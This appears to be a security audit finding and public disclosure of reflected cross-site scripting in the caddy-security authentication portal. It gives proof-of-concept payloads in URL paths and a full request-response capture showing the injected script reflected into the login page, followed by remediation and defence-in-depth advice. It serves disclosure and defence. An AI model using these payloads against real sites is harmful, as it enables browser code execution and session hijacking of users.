Reflected Cross-Site Scripting

[ahpaleus]

Severity: High

Reflected XSS occurs when an application includes untrusted data in the HTML response sent to the user’s browser. In this case, the provided /admin%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/admin/login or /settings/mfa/delete/<img%20src=x%20onerror=alert(document.domain)> API calls trigger an alert. An attacker can exploit this vulnerability to execute arbitrary JavaScript code within the target user’s browser, potentially leading to further attacks such as session hijacking.

Example request-response cycle that triggers alert:

GET /adminhxuk8%22%3e%3cscript%3ealert(document.domain)%3c/script%3ecsdz9/admin/login HTTP/2
Host: internal.caddysecurity.portal
Cookie: AUTHP_SESSION_ID=XYZ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

HTTP/2 200 OK
Content-Type: text/html
Server: Fly/a0b91024 (2023-06-13)
Date: Wed, 19 Jul 2023 08:07:56 GMT
Via: 2 fly.io
Fly-Request-Id: 01H5PK218K0V14GFS0GB3XDF31-waw

<!DOCTYPE html>
<html lang="en" class="h-full bg-blue-100">
  <head>
    <title>Authentication Portal - Sign In</title>
    <!-- Required meta tags -->
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <meta name="description" content="Performs user authentication." />
    <meta name="author" content="Paul Greenberg github.com/greenpau" />
    <link rel="shortcut icon" href="/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/assets/images/favicon.png" type="image/png" />
    <link rel="icon" href="/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/assets/images/favicon.png" type="image/png" />
    <link rel="stylesheet" href="/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/assets/google-webfonts/roboto.css" />
    <link rel="stylesheet" href="/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/assets/line-awesome/line-awesome.css" />
    <link rel="stylesheet" href="/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/assets/css/login.css" />
    
  </head>

  
  


  <body class="h-full">
    <div class="app-page">
      <div class="app-content">
        <div class="app-container">
          <div class="logo-box">
            
              <img class="logo-img" src="/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/assets/images/logo.svg" alt="Authentication Portal" />
            
            <h2 class="logo-txt">Sign In</h2>
          </div>

          

          
            <div id="authenticators" class="flex flex-col gap-2">
              
                <div>
                  
                    <a href="oauth2/google">
                      <div class="app-login-btn-box">
                        <div class="p-4 bg-[#e53935] text-[white] shadow-sm rounded-l-md text-2xl">
                          <i class="lab la-google la-2x"></i>
                        </div>
                        <div class="app-login-btn-txt">
                          <span class="uppercase leading-loose">Google</span>
                        </div>
                      </div>
                    </a>
                  
                </div>
              
            </div>
          
        </div>
        <div id="bookmarks" class="px-4 hidden sm:block">
          <div onclick="showQRCode('/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/qrcode/login.png');return false;" class="bg-[#24292f] text-[#f6f8fa] py-1 px-1 shadow-xl rounded-b-lg pb-2 text-center" style="max-width: 3em;">
            <i class="las la-qrcode text-3xl"></i>
          </div>
        </div>
        <div id="qr" class="px-4 flex justify-center hidden">
          <div id="qrcode" onclick="hideQRCode();return false;" class="bg-white border border-t-2 py-1 px-1 shadow-xl rounded-b-lg pb-2 max-w-xs inline-flex"></div>
        </div>
      </div>
    </div>
    <!-- JavaScript -->
    <script src="/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/assets/js/login.js"></script>
    
  </body>
</html>

To immediately address this issue, strategically treat all string values as potentially untrustworthy, regardless of their source, and escape them properly (using the safehtml/template package that generates output-safe HTML).

In addition to that remediation, we also suggest a few different ways to improve defense in depth:

• Extend unit tests with potentially malicious XSS payloads. Refer to the Cross-site scripting (XSS) cheat sheet for various attack vectors.
• Consider using the Active Scanner from Burp Suite Professional in a testing environment for all API calls. Additionally, use the scanning with a live task strategy to have underlying requests scanned automatically when interacting with the web interface.
• Expand the caddy-security documentation to promote security headers—especially the Content Security Policy (CSP) header that controls which resources can be loaded by the browser, limiting the impact of potential XSS attacks.

More information about the issue and our public disclosure:

• https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/